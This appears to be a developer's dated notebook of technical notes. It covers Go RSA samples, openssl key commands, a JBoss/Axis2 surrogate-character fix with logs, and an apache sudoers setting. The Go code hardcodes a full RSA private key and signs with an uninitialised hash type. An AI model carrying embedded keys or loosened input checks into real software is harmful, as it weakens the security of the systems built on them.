	fmt.Println()
	fmt.Println("Modulus : ", N.String())
	fmt.Println()

	// EncryptOAEP
	msg := []byte("The secret message!")
	label := []byte("")
	sha1hash := sha1.New()

	encryptedmsg, err := rsa.EncryptOAEP(sha1hash, rand.Reader, publickey, msg, label)

	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	fmt.Printf("OAEP encrypted [%s] to \n[%x]\n", string(msg), encryptedmsg)
	fmt.Println()

	// DecryptOAEP
	decryptedmsg, err := rsa.DecryptOAEP(sha1hash, rand.Reader, privatekey, encryptedmsg, label)

	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	fmt.Printf("OAEP decrypted [%x] to \n[%s]\n", encryptedmsg, decryptedmsg)
	fmt.Println()

	// EncryptPKCS1v15
	encryptedPKCS1v15, errPKCS1v15 := rsa.EncryptPKCS1v15(rand.Reader, publickey, msg)

	if errPKCS1v15 != nil {
		fmt.Println(errPKCS1v15)
		os.Exit(1)
	}

	fmt.Printf("PKCS1v15 encrypted [%s] to \n[%x]\n", string(msg), encryptedPKCS1v15)
	fmt.Println()

	// DecryptPKCS1v15
	decryptedPKCS1v15, err := rsa.DecryptPKCS1v15(rand.Reader, privatekey, encryptedPKCS1v15)

	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	fmt.Printf("PKCS1v15 decrypted [%x] to \n[%s]\n", encryptedPKCS1v15, decryptedPKCS1v15)
	fmt.Println()

	// SignPKCS1v15
	var h crypto.Hash
	message := []byte("This is the message to be signed!")
	hash := sha1.New()
	io.WriteString(hash, string(message))
	hashed := hash.Sum(nil)

	signature, err := rsa.SignPKCS1v15(rand.Reader, privatekey, h, hashed)

	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}

	fmt.Printf("PKCS1v15 Signature : %x\n", signature)

	//VerifyPKCS1v15
	err = rsa.VerifyPKCS1v15(publickey, h, hashed, signature)

	if err != nil {
		fmt.Println("VerifyPKCS1v15 failed")
		os.Exit(1)
	} else {
		fmt.Println("VerifyPKCS1v15 successful")
	}
	fmt.Println()

}

package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/hex"
	"encoding/pem"
	"errors"
	"fmt"
	"io/ioutil"
	"math/big"
	"strconv"
)

/*
show by command prompt
openssl genrsa -out key.pem
openssl rsa -in key.pem  -pubout > key-pub.pem


echo polaris@studygolang.com | openssl rsautl \
     -encrypt \
     -pubin -inkey key-pub.pem \
 > cipher.txt

cat cipher.txt | openssl rsautl \
    -decrypt \
    -inkey key.pem


** OR encoding by base64 **
echo polaris@studygolang.com | openssl rsautl \ 
      -encrypt -pubin -inkey key-pub.pem \
      | openssl base64
openssl base64 -d | openssl rsautl -decrypt -inkey key.pem

*/

var privateKey = []byte(`
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwOJK1RJBUwRu/5aCyktTaietXFMOAAkElhSq1M6BocVWs7yD
y592CX30Bl0Ul4faWM9EZSlhak8Ay1CdMNis+lBZanKmAO2bPmSIIYBDQE2BzLIo
MoJWi/Cd5PevioKSRPytqVB/S4+xz1IOD8Y407SZM3LfZ5XMfqC+VHpcnAycQ8iT
FK0s3yjImathFNF3U7fiEzU4G7PJRn8e9ntubDd1pXYABqrVF/REcd/3Rs/qrlhG
v3b7tAXZb2lkSLdCq3Md+BMksxUCoH3rZijSphbZSCdIrzofg+IG0y5WtdsBz6uw
Ol2QX/EUoEdO+xhLgaOFykUoWz037ZzkLEhKkQIDAQABAoIBAB+1lAPPSnnxYqYW
Ak5rb70l5LQm20haMyzRHPx7Loh/vq8xsKELCAardDCPoNEAfn7XJDFVSjSF5GWI
TS84j8de6jQ7wNqqNTleoZqQUX4Cv/H83+rdzoiW9/4qUet9Z7p7p7kMCMFNUDf7
D2C8f58eM4lnux52W/X9SwzsSMlGaGHcAKPz4vXUFWyt3naVtANhdkHjgKxA0Ev4
W7yRgpbOKruPKzBNTRXAqq+yHZj/pONtXl8do+plwhHU8CW0BPyvkU4DH52lxWza
mM71ow8UJC30FXF/NZ+wthFnRZO3/dhaeuNYgX7yAs3DhNn7Q8nzU4ujd8ug2OGf
iJ9C8YECgYEA32KthV7VTQRq3VuXMoVrYjjGf4+z6BVNpTsJAa4kF+vtTXTLgb4i
jpUrq6zPWZkQ/nR7+CuEQRUKbky4SSHTnrQ4yIWZTCPDAveXbLwzvNA1xD4w4nOc
JgG/WYiDtAf05TwC8p/BslX20Ox8ZAXUq6pkAeb1t8M2s7uDpZNtBMkCgYEA3QuU
vrrqYuD9bQGl20qJI6svH875uDLYFcUEu/vA/7gDycVRChrmVe4wU5HFErLNFkHi
uifiHo75mgBzwYKyiLgO5ik8E5BJCgEyA9SfEgRHjozIpnHfGbTtpfh4MQf2hFsy
DJbeeRFzQs4EW2gS964FK53zsEtnr7bphtvfY4kCgYEAgf6wr95iDnG1pp94O2Q8
+2nCydTcgwBysObL9Phb9LfM3rhK/XOiNItGYJ8uAxv6MbmjsuXQDvepnEp1K8nN
lpuWN8rXTOG6yG1A53wWN5iK0WrHk+BnTA7URcwVqJzAvO3RYVPqqlcwTKByOtrR
yhxcGmdHMusdWDaVA7PpS1ECgYATCGs/XQLPjsXje+/XCPzz+Epvd7fi12XpwfQd
Z5j/q82PsxC+SQCqR38bwwJwELs9/mBSXRrIPNFbJEzTTbinswl9YfGNUbAoT2AK
GmWz/HBY4uBoDIgEQ6Lu1o0q05+zV9LgaKExVYJSL0EKydRQRUimr8wK0wNTivFi
rk322QKBgHD3aEN39rlUesTPX8OAbPD77PcKxoATwpPVrlH8YV7TxRQjs5yxLrxL
S21UkPRxuDS5CMXZ+7gA3HqEQTXanNKJuQlsCIWsvipLn03DK40nYj54OjEKYo/F
UgBgrck6Zhxbps5leuf9dhiBrFUPjC/gcfyHd/PYxoypHuQ3JUsJ
-----END RSA PRIVATE KEY-----
`)

var publicKey = []byte(`
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwOJK1RJBUwRu/5aCyktT
aietXFMOAAkElhSq1M6BocVWs7yDy592CX30Bl0Ul4faWM9EZSlhak8Ay1CdMNis
+lBZanKmAO2bPmSIIYBDQE2BzLIoMoJWi/Cd5PevioKSRPytqVB/S4+xz1IOD8Y4
07SZM3LfZ5XMfqC+VHpcnAycQ8iTFK0s3yjImathFNF3U7fiEzU4G7PJRn8e9ntu
bDd1pXYABqrVF/REcd/3Rs/qrlhGv3b7tAXZb2lkSLdCq3Md+BMksxUCoH3rZijS
phbZSCdIrzofg+IG0y5WtdsBz6uwOl2QX/EUoEdO+xhLgaOFykUoWz037ZzkLEhK
kQIDAQAB
-----END PUBLIC KEY-----
`)

func RsaEncryptByPreSetPubKey() string {
	n, _ := new(big.Int).SetString("24349343452348953201209477858721354875245881458202672294652984377378513954748002477250933828219774703952578332297494223229725595176463711802920124930360492553186030821158773846902662847263120685557322462156596316871394035160273640449724455863863094140814233064652945361596472111169159061323006507670749392076044355771083774400487999226532334510138900864338047649454583762051951010712101235391104817996664455285600818344773697074965056427233256586264138950003914735074112527568699379597208762648078763602593269860453947862814755877433560650621539845829407336712267915875159364773551462882284084578152070138814976772753", 10)
	e, _ := strconv.ParseInt("10001", 16, 0)

	fmt.Printf("##RsaEncrypt2 n %x\n", n)
	fmt.Printf("##RsaEncrypt2 e %x\n", e)
	pubKey := rsa.PublicKey{n, int(e)}
	data, _ := rsa.EncryptPKCS1v15(rand.Reader, &pubKey, []byte("it's great for rsa"))

	return hex.EncodeToString(data)
}

func main() {
	msg := "polaris@studygolang.com"
	data, err := RsaEncrypt([]byte(msg))
	fmt.Printf("PKCS1v15 encrypted [%s] to \n[%x]\n", string(msg), data)

	ioutil.WriteFile("encrypted.txt", data, 0644)

	if err != nil {
		panic(err)
	}
	origData, err := RsaDecrypt(data)
	if err != nil {
		panic(err)
	}
	fmt.Println("origData >> ", string(origData))

	//cipherText, _ := hex.DecodeString("b6ee3caf14430003a20625ba1ea9ad31560ad203f7ecee46dd8e31f2dc47d278f3248bc0180e03571fdbf34a60aad7310468e6d6013fcfd6b785d1562411b44e089281adcc275a2037db3dec8b447b91162c859ab97372081c1bcb22a1fb33b1f72a06a54b1784d9f733aa1e869c6d64d45a7a78534714a773920ef7219b31f89092fc54f87ff371aeae5c3e59cdaad3fa05c24e781e06fcd46b35127a431bd85f62bafded95e3d31127159a0b5d13b77f11ecef94a037ac1d2f2c32fc0e6623cfe056127457f8f82631c33139a50fcd16c17e577b12f853cd55ffb16e099097dd76a21d987c536ac102b470e36881fc86f1667b505120a531458a116ca285b7")
	cipherText, _ := hex.DecodeString(RsaEncryptByPreSetPubKey())

	origData2, err := RsaDecrypt(cipherText)
	if err != nil {
		panic(err)
	}
	fmt.Println("origData2 >> ", string(origData2))

}

// 加密
func RsaEncrypt(origData []byte) ([]byte, error) {
	block, _ := pem.Decode(publicKey)
	if block == nil {
		return nil, errors.New("public key error")
	}
	pubInterface, err := x509.ParsePKIXPublicKey(block.Bytes)
	if err != nil {
		return nil, err
	}
	pub := pubInterface.(*rsa.PublicKey)

	fmt.Println("Modulus : ", pub.N.String())

	fmt.Println(">>> ", pub.N)
	fmt.Printf("Modulus(Hex) : %X\n", pub.N)
	fmt.Println("Public Exponent : ", pub.E)

	return rsa.EncryptPKCS1v15(rand.Reader, pub, origData)
}

// 解密
func RsaDecrypt(ciphertext []byte) ([]byte, error) {
	block, _ := pem.Decode(privateKey)
	if block == nil {
		return nil, errors.New("private key error!")
	}
	priv, err := x509.ParsePKCS1PrivateKey(block.Bytes)
	if err != nil {
		return nil, err
	}
	return rsa.DecryptPKCS1v15(rand.Reader, priv, ciphertext)
}

2016-07-27

2016-07-27

Repair file system openssl keygen

On folder /opt, just want to change the directory mode to 666, but run sudo chmod -R 666 .., then all commands like ‘ls’, ‘which’, ‘pwd’ do not work.

Fix
Login as root, run chmod 755 / chmod 755 /bin chmod 755 /usr
Openssl and Keygen
`
ssh public key stored in .ssh folder:
ssh-keygen -f koding -y > koding_id_rsa.pub

output public key from the private key
openssl rsa -in koding -pubout > koding-pub.pem

p12 file (usually with .pfx extension) contains certificate, public key, private key
openssl x509 - for certificate
openssl x509 -inform der -in certificate.cer -out certificate.pem (with -pubkey -noout to print public key only)

openssl pkcs12 - for p12 file
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes

openssl rsa - for private key
openssl rsa -in koding -out koding2 (Remove a passphrase from a private key)

openssl req - for private key and csr related
openssl req -out CSR.csr -key privateKey.key -new
`

2016-01-05

2016-01-05

Axis2-xmlbeans-EJB3-Extension-B-Character

Class MyEJB

package my.test;

import java.util.ArrayList;
import java.util.Calendar;
import java.util.List;

import xx.webservices.type.ESubmissionBatchType;
import xx.webservices.type.ESubmissionListType;
import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.annotation.security.PermitAll;
import javax.ejb.EJBException;
import javax.ejb.Stateless;
import javax.ejb.TransactionManagement;
import javax.ejb.TransactionManagementType;

@Stateless(name = "MyEJB")
@TransactionManagement(TransactionManagementType.BEAN)
@PermitAll
public class MyEJB implements IMyEJB, IMyEJBLocal {
	public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
			throws EJBException {
		YYSubmissionResponseDocument outDoc = YYSubmissionResponseDocument.Factory.newInstance();
		ESubmissionBatchType esubBatchType = outDoc.addNewYYSubmissionResponse().addNewOut();
		Calendar fromDate = Calendar.getInstance();
		Calendar toDate = Calendar.getInstance();

		esubBatchType.setFromDateTime(fromDate);
		esubBatchType.setToDateTime(toDate);

		List<String> returnList = new ArrayList<String>();
		String a = "\uD840\udcd9";
		String b = "\uD840\udc59";
		returnList.add(a);
		returnList.add(b);

		ESubmissionListType eSubmitListType = esubBatchType.addNewESubmissionList();
		for (int i = 0; i < returnList.size(); i++) {
			eSubmitListType.addESubmission(returnList.get(i));
		}

		esubBatchType.setNoOfSubmission(new Integer(eSubmitListType.sizeOfESubmissionArray()).toString());

		return outDoc;

	}
}

Interface IMyEJB

package my.test;

import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.ejb.EJBException;
import javax.ejb.Remote;

@Remote
public interface IMyEJB {
	public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
			throws EJBException;
}

Interface IMyEJBLocal

package my.test;

import xx.webservices.type.YYSubmissionRequestDocument;
import xx.webservices.type.YYSubmissionResponseDocument;

import javax.ejb.EJBException;
import javax.ejb.Local;

@Local
public interface IMyEJBLocal {
	public YYSubmissionResponseDocument getYYSubmission(YYSubmissionRequestDocument YYSubmissionRequest)
			throws EJBException;
}

Class ABCSkeleton

package my.test;

public class ABCSkeleton {

	public xx.webservices.type.YYSubmissionResponseDocument getYYSubmission(
			xx.webservices.type.YYSubmissionRequestDocument YYSubmissionRequest) {

		xx.webservices.type.YYSubmissionResponseDocument outDoc = null;
		try {
			outDoc = getMyEJB().getYYSubmission(YYSubmissionRequest);
			return outDoc;
		} catch (Exception e) {
			log.error("Exception in getYYSubmission", e);
			throw new java.lang.UnsupportedOperationException(e);
		}
	}

  private IMyEJB getMyEJB() throws Exception {
		InitialContext initialContext = new InitialContext();
		IMyEJB myEJB = (IMyEJB) initialContext.lookup("java:app/my_app/MyEJB!my.test.IMyEJB");
		return myEJB;
	}
}

application.xml

<?xml version="1.0" encoding="UTF-8"?>
<application 
	xmlns="http://java.sun.com/xml/ns/javaee" 
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/application_6.xsd"
	version="6">
	
	<application-name>ww_ds</application-name>
	<initialize-in-order>true</initialize-in-order>

	<module>
		<web>
			<web-uri>axis2.war</web-uri>
			<context-root>yy_ws</context-root>
		</web>
	</module>
	<module>
		<ejb>my_app.jar</ejb>
	</module>
	<library-directory>lib</library-directory>
</application>

Deploy this ear to JBoss EAP 6.4

copy the yy.ear to folder sftp://support@10.13.135.37//opt/software/jboss-eap-6.4/standalone/deployments/

Call webservice via http

curl http://10.13.135.37:9080/yy_ws/services/esubmission/getYYSubmission
Throw error as

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<faultstring>
java.lang.RuntimeException: JBAS014154: Failed to marshal EJB parameters
</faultstring>

Trace log in /tmp/axis2.log

In yy.ear/axis2.war/WEB-INF/classes/log4j.properties, set option log4j.rootCategory=INFO, CONSOLE, LOGFILE and log4j.appender.LOGFILE.File=/tmp/axis2.log
Found error as

2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.values.XmlObjectBase$SerializedRootObject.readObject(XmlObjectBase.java:2652)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at java.lang.reflect.Method.invoke(Method.java:497)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.reflect.SerializableClass.callReadObject(SerializableClass.java:307)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.initSerializableClone(SerializingCloner.java:303)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:251)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:172)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:128)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:295)
2016-01-05 19:02:29,194 [http-/0.0.0.0:9080-1] INFO  stdout  - 	... 42 more
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - Caused by: org.apache.xmlbeans.XmlException: error: Illegal XML Character: 0xd840
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - org.apache.xmlbeans.impl.piccolo.io.IllegalCharException: Illegal XML Character: 0xd840
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.XMLReaderReader.read(XMLReaderReader.java:146)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.PiccoloLexer.yy_refill(PiccoloLexer.java:3474)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.PiccoloLexer.yylex(PiccoloLexer.java:3958)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.yylex(Piccolo.java:1290)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.yyparse(Piccolo.java:1400)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.piccolo.xml.Piccolo.parse(Piccolo.java:714)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.store.Locale$SaxLoader.load(Locale.java:3435)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.store.Locale.parse(Locale.java:706)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.store.Locale.parseToXmlObject(Locale.java:690)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.store.Locale.parseToXmlObject(Locale.java:677)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.schema.SchemaTypeLoaderBase.parse(SchemaTypeLoaderBase.java:208)
2016-01-05 19:02:29,195 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.xmlbeans.impl.values.XmlObjectBase$SerializedRootObject.readObject(XmlObjectBase.java:2648)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at java.lang.reflect.Method.invoke(Method.java:497)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.reflect.SerializableClass.callReadObject(SerializableClass.java:307)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.initSerializableClone(SerializingCloner.java:303)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:251)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:172)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.marshalling.cloner.SerializingCloner.clone(SerializingCloner.java:128)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:295)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:286)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.ejb3.remote.LocalEjbReceiver.processInvocation(LocalEjbReceiver.java:258)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:184)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBObjectInterceptor.handleInvocation(EJBObjectInterceptor.java:58)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBHomeInterceptor.handleInvocation(EJBHomeInterceptor.java:83)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.TransactionInterceptor.handleInvocation(TransactionInterceptor.java:42)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.ReceiverInterceptor.handleInvocation(ReceiverInterceptor.java:125)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBInvocationHandler.sendRequestWithPossibleRetries(EJBInvocationHandler.java:255)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBInvocationHandler.doInvoke(EJBInvocationHandler.java:200)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBInvocationHandler.doInvoke(EJBInvocationHandler.java:183)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.ejb.client.EJBInvocationHandler.invoke(EJBInvocationHandler.java:146)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at com.sun.proxy.$Proxy36.getYYSubmission(Unknown Source)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at xx.webservices.esubmission.EsubmissionSkeleton.getYYSubmission(EsubmissionSkeleton.java:64)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at xx.webservices.esubmission.EsubmissionMessageReceiverInOut.invokeBusinessLogic(EsubmissionMessageReceiverInOut.java:51)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.receivers.AbstractInOutSyncMessageReceiver.invokeBusinessLogic(AbstractInOutSyncMessageReceiver.java:42)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.receivers.AbstractMessageReceiver.receive(AbstractMessageReceiver.java:96)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.engine.AxisEngine.receive(AxisEngine.java:145)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.transport.http.util.RESTUtil.invokeAxisEngine(RESTUtil.java:125)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.transport.http.util.RESTUtil.processURLRequest(RESTUtil.java:119)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.transport.http.AxisServlet$RestRequestProcessor.processURLRequest(AxisServlet.java:799)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.axis2.transport.http.AxisServlet.doGet(AxisServlet.java:242)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at javax.servlet.http.HttpServlet.service(HttpServlet.java:734)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at javax.servlet.http.HttpServlet.service(HttpServlet.java:847)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:295)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:231)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:149)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.jpa.interceptor.WebNonTxEmCloserValve.invoke(WebNonTxEmCloserValve.java:50)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.jpa.interceptor.WebNonTxEmCloserValve.invoke(WebNonTxEmCloserValve.java:50)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.jboss.as.web.security.SecurityContextAssociationValve.invoke(SecurityContextAssociationValve.java:169)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:150)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:97)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:102)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:344)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:854)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:653)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:926)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO  stdout  - 	at java.lang.Thread.run(Thread.java:745)

Update method read in class XMLReaderReader from source code of xmlbeans

if (c >= 0x20) {
    if ((c <= 0xD7FF) ||
        (c >= 0xE000 && c <= 0xFFFD) ||
        (c >= 0x10000 && c <= 0x10FFFF) ||
        // bypass surrogate pair character
        XMLChar.isHighSurrogate(c) || XMLChar.isLowSurrogate(c)) {

        sawCR = false;
        destbuf[off+ (charsRead++)] = c;
    }
    else
        throw new IllegalCharException(
        "Illegal XML Character: 0x"+Integer.toHexString(c));
}

Call webservice via http again

curl http://10.13.135.37:9080/yy_ws/services/esubmission/getYYSubmission
Result as

This XML file does not appear to have any style information associated with it. The document tree is shown below.
<type:YYSubmissionResponse xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:out xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:FromDateTime xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2016-01-05T19:53:15.159+08:00</type:FromDateTime>
<type:ToDateTime xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2016-01-05T19:53:15.159+08:00</type:ToDateTime>
<type:NoOfSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2</type:NoOfSubmission>
<type:eSubmissionList xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:eSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">𠃙</type:eSubmission>
<type:eSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">𠁙</type:eSubmission>
</type:eSubmissionList>
</type:out>
</type:YYSubmissionResponse>

2015-12-21

2015-12-21

Running apache as a non-root user

sudo

in file sudoers add following
username ALL=NOPASSWD:/usr/bin/service apache2 reload

Run on port 8080 and use iptables to redirect packets

